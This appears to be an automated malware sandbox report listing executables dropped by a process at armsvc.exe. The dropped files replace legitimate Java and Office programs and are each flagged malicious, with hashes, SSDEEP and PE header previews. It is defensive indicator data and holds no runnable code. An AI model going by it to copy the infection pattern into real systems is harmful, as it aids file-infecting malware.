                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529357861203298
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:ew/YiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:fS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:CF93893CBCB9FD2065645BE2745D100B
                                                                                                                                                  SHA1:C7342A1171210D94ABE41D9423DF65DFFD774A2B
                                                                                                                                                  SHA-256:63C2072193953BCC710B025C50D578FFD3BDCAF0EA6599B5200EA8D6EB47ECF5
                                                                                                                                                  SHA-512:7C5447EF724217513CB2AC623EAF98E1193675543623BFC4EF69DB2DB88595F62374EB070C74C810BF30540DB5B2941813194287421980DB362B7D59884FFC06
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529281003193878
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:0AmoiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:xr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:CB75D62DC8A10349A4D94EAF3442A8AF
                                                                                                                                                  SHA1:BD292C54907E11259CC16075CDDA9366233AB081
                                                                                                                                                  SHA-256:7486EECD0F2FF6FF60B504A04271A8568EB0ACE32CA130483C8CEFC5A0E92EEC
                                                                                                                                                  SHA-512:345F08326137AC16F782A533160566C8DA70331E9CEC4E2C1D165D21FB72EB7B0F59ACB5BE59A3688F510906AF09234660C13060DEF6E4397D40A93A44FD35E3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................-........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529320381532006
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:S1SQiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:ov/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:6583E40BECCCFE6F6F76281DEF62316F
                                                                                                                                                  SHA1:2D77BA43B4B7A936B39651291EA47068B09B8DFE
                                                                                                                                                  SHA-256:0485E85B6939D2A7B5C52DBDBB6799E79AA36A0365534B8D415CD215D3904530
                                                                                                                                                  SHA-512:1914F81C8515F26281CE1D210AD012C5357C738001931A48B8CEC49FE24CF208AFBC88047EAD21A33FB8B805AA2064FA62222078270AEB21DAE1A18455052DE7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................&........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529391610842829
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:5U/YiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:2S/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:B47A4E033B71AAB469201A2EDAA30811
                                                                                                                                                  SHA1:C4E63E4E41F1CB1B15A67B8D6AAD8BCE28114A5C
                                                                                                                                                  SHA-256:DA81F6CFBFE93C5BF9BA01CDA2404666E1A7BFBA36C34545AA4D3AD8AF59C262
                                                                                                                                                  SHA-512:23F31D54D3DF683380F40315B01349A213086F0473D27D7E1A4091ED7731C6498D0FE6A535A7EF2BB3C452B174329658C5B428ED129C0FD5EFB59738079F05A8
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................x........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1358336
                                                                                                                                                  Entropy (8bit):4.612101598034031
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:tEs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:tXLNiXicJFFRGNzj3
                                                                                                                                                  MD5:5E43BAD49E482B8F2EB2AF13AB31973B
                                                                                                                                                  SHA1:B0E1E0307DC3FD304EDF9B4F8D6061DB1F15B80F
                                                                                                                                                  SHA-256:0365EEB05A88D3931A058DDFE71EB5977AA6D438D7B3ED36C8F2D444D3A596DD
                                                                                                                                                  SHA-512:9CC9715D4E4B4D4BC01A36CFEAD459B7D1425CF48C9CD7249EECDB833A3E7C0877F769F6B79FA5C1DDEB92F7C41A63FF4AFBE9A3D9E50B72F77BA464B75619A2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................h...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1298432
                                                                                                                                                  Entropy (8bit):4.5289694914569
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:7FQ0iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:RJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:504B2F9BAD5E5DE065E818F904149B8D
                                                                                                                                                  SHA1:31785C1EEA0B29988DAA407D413AC61C3EF15A17
                                                                                                                                                  SHA-256:47A799BC4993CFEBCBFE607508ABBD96A3ED9BEFCC939AAFFFD438FD47A2A654
                                                                                                                                                  SHA-512:1CF78A1B34275A5E84149F48EC3BB23B43CA2F814DFA07FD62DBD334448C020AB79AD4A3B02F5F20CBEE195162F65251E211323D312488026C8E426251CDB982
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..................................l.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...`...P.......0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1454592
                                                                                                                                                  Entropy (8bit):4.787851016884923
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Qi7le3roAI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zloroAILNiXicJFFRGNzj3
                                                                                                                                                  MD5:B10F80D1F6B68448B497D59C88F855D8
                                                                                                                                                  SHA1:BDA053D6C0A2D5D7F0022F24395E568E9AB91A5F
                                                                                                                                                  SHA-256:B5589EE873BEB4F28FEC3BCE5941DF22EB2B783657F5A81DF263D6F07E7D54AA
                                                                                                                                                  SHA-512:82F97FDA447AD5307BD69D872A4D2D46A896D577BF4C5F9E9D3014976D69F96A30EB1231B0B3B3607B901000A4EABF95ADEA406D3B36C855DB926B40F3442C8E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................@!.........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1424896
                                                                                                                                                  Entropy (8bit):4.811524742068078
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:7NfQNt/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:RGtLNiXicJFFRGNzj3
                                                                                                                                                  MD5:1D461E4AF3D39CD739765541BB8E444C
                                                                                                                                                  SHA1:A10C205329F775A451F5DDFBC621B4A894EB6DA4
                                                                                                                                                  SHA-256:FFFDE893A6040A15D67AD4B83512F029138319FE324207B02F8151725B57DB88
                                                                                                                                                  SHA-512:001A521DB189788A5EC6F4966D3CAA6106F30CB4F7FE01B43458109A2DED07B3D29FA53EDF6133FAE2FC3B2266C1F5AFB80122BCE330553356C4B8F33836EB8D
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................... ......J......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...p...@......................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1443328
                                                                                                                                                  Entropy (8bit):4.832399668119106
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:yLii/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0LNiXicJFFRGNzj3
                                                                                                                                                  MD5:5CD662111B715CFB14415324AFB6807B
                                                                                                                                                  SHA1:27C420610E788726D70BF1634A7D6780CCE0E5F7
                                                                                                                                                  SHA-256:308BB28074D2A203A867B2AEB9C2BB0ECCBAC94A7D5F386008EFEF6C3E167B6A
                                                                                                                                                  SHA-512:1BF683C1E9EC516C04EEB9B5537301B68FEBF16219B23F2CF8F42DC145B82D764124A16DE49434642ED9C99BC3EB0F41DC8A8DBD25F928FF2DA7AD8C44318237
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1443328
                                                                                                                                                  Entropy (8bit):4.83239334892395
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ZLii/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DLNiXicJFFRGNzj3
                                                                                                                                                  MD5:CA437280658F4A46ADC57498E5DF48DF
                                                                                                                                                  SHA1:B4AF2921E5E84652DB03B1CB21B8025C88EE56DB
                                                                                                                                                  SHA-256:155E683F58DA8DD1D213D136D65EED577A9D5212D35F9B6184A348168F9946C7
                                                                                                                                                  SHA-512:A3A704DA31FDE8BE2DB5FA019508B20FD2C1D015285749C2B3996651644B256D796EC0C9F7585CEDC1C2B775F6109610A06319A7BD37F8ED70ECF0EFD6545378
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .....8q........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1499136
                                                                                                                                                  Entropy (8bit):4.787944047801101
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:kf2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kf2LNiXicJFFRGNzj3
                                                                                                                                                  MD5:4EACC5E5D64FB5562D3E43D4F232FA1C
                                                                                                                                                  SHA1:595D443743B81CBE9773D9BAB6D9021B29AA91A1
                                                                                                                                                  SHA-256:3FEC2D728AE23644D793FF3A07ACC3D9D5F1BDA7F19C23B282AA45CB40E3E79A
                                                                                                                                                  SHA-512:8525F419DE0C0DBBA33143B4B14F5D35D48D85F179D38000AEBA2B1EE936F976BFF607EB977042AFD910BBCC29DE0224B7BE545AD69C31FB5DDF7D12B15D6B6B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@..............................!......K.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1651712
                                                                                                                                                  Entropy (8bit):5.153484784693589
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:+bUO42K/E0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:+R0LNiXicJFFRGNzj3
                                                                                                                                                  MD5:54D7863E22B496441097EC6189990F11
                                                                                                                                                  SHA1:61490A8D086B28F902913A32CC080C5BF51E06F2
                                                                                                                                                  SHA-256:542D8779F6F27EDBBED16DAF717525CD4A7E6C2976FC98D31D3CD4FA52B2AE28
                                                                                                                                                  SHA-512:9EFC72F808130E63B36EF7265662B1D3DDC9C45BD159D14AA2ED560417EF63A78A7602ED4696317A7DD62F44D52F3BA1B4B461C5DB53380D114E87125C5C01DD
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@..........................0$.................. ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):52712960
                                                                                                                                                  Entropy (8bit):7.961744860662916
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1572864:kKjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:HicZmsR3Lo/cnLe
                                                                                                                                                  MD5:DC130ED54EA46279771715999DE4E08A
                                                                                                                                                  SHA1:C03193E197A3D5BFF1EAD48ECF176C6218997372
                                                                                                                                                  SHA-256:AB65BC53D46EC91C33E9F338DB3D0E9AA09C75428ADC968EDDFE0FFD10B9F2B1
                                                                                                                                                  SHA-512:AFA5118C1227AF4E16D4655C5AEA2504CDEBAAA5CC1E9F415519760C25703CDE45E08570083704EE0EF7F328FE317A1B479376C9A1AF21960D12EA56EEE2E203
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....j.$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4993536
                                                                                                                                                  Entropy (8bit):6.808159034893057
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:olkkCqyDEY7+o3OBvfGVY+40yaHyS+9s/pLR7wRGpj3:ykkCqaE68eV+0yAE6L1F9
                                                                                                                                                  MD5:D5AEB696E27B257160DB0AA4DEC61D27
                                                                                                                                                  SHA1:87AA9F995FE60272B417F903EA431E6D51BBAD4C
                                                                                                                                                  SHA-256:92E7F15FE120278569CA8E5606C79899186C176CB9E9F2084B2F59026A052614
                                                                                                                                                  SHA-512:616A59E0C5DFBF48EC1566C75C7FB88CF2C62B2D38FAEC525DE5FED03057621F32377A1D742D5E131AED034367695AEAE39EB801A5A44B4234B7BF7BB60691AB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL.....w.L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1324032
                                                                                                                                                  Entropy (8bit):4.5502401544644675
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:XiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:j/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:C9975780F528FCE195E76A438415FB7A
                                                                                                                                                  SHA1:499AB65E1459F36A2A773DA48B9AA7961875F46A
                                                                                                                                                  SHA-256:033C3E007AA02197A779DEDDD6C529F4999F3996317F7B0BDB45724BDE2F0BA3
                                                                                                                                                  SHA-512:5034FEA0712F33227C6A2772A68C17087E371CCBFA5ADFF3D257D126F72307C9F1CDE6A6339ADFDA6534A748531C438BE14F4205FFAA6E80BC127B8586CC52A9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@.......................... .........................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1678336
                                                                                                                                                  Entropy (8bit):4.928002299015052
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:7yAAWSS2Ht3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7IUMt3LNiXicJFFRGNzj3
                                                                                                                                                  MD5:9041A94CFCF6C29217D288349E69E3B8
                                                                                                                                                  SHA1:160C77701F31CCFB153504962E6AD0BC9D44B7A5
                                                                                                                                                  SHA-256:A2263BC86226F7CDBD1FEEE70BEF89C5D2CCCBE724C2049EAFF15E2DDE44B317
                                                                                                                                                  SHA-512:A6E7931B31BD2386EDD4B69C303FE12D992131A4A16AE47161FA5B1D97F3406B01819B53D395C2B6121D44001B5FB66F2556616470D39499735B690F1AB0096A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@...........................$.....Z...................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1449472
                                                                                                                                                  Entropy (8bit):4.753527362242671
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ASG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qLNiXicJFFRGNzj3
                                                                                                                                                  MD5:7DCC637961C221E4F5CE79D608CBAF27
                                                                                                                                                  SHA1:E472AD1391AB38FF791AD80E105864C6E042DD37
                                                                                                                                                  SHA-256:CF596286FE4C67D868E544F3C5A351BE2413AAD98E46565227219919C1F5806F
                                                                                                                                                  SHA-512:1191552F2524FFCAEFA12E3DE714DD8C8D217EABD4CF13A711991728901CD4F27A6AF1347955DCC175CD633DE6DF646048EB4ACC083D74092083F0CCA0392AE1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@...........................!..............................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...............^..............@...........................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1303552
                                                                                                                                                  Entropy (8bit):4.538127877587889
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:J0aiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Z/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:F2662F4535D0B91367DD232B92B9175F
                                                                                                                                                  SHA1:84418ECBB88AE0A31FE59B9DBAF3C76DB9A79F2E
                                                                                                                                                  SHA-256:BA77962A33C6802C1999F6456BCCBCD6FA9D65D90D8A1F1996C1779EC48F0C14
                                                                                                                                                  SHA-512:581A02D3393708D4E41CF98B2F6CBF3B763D111E4265058CE32D92509E680A2482C2BC063853B379B865A04D51530992E322BE3EEB44768BB76526CB33DCB448
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@..........................................................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc...`...........D..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

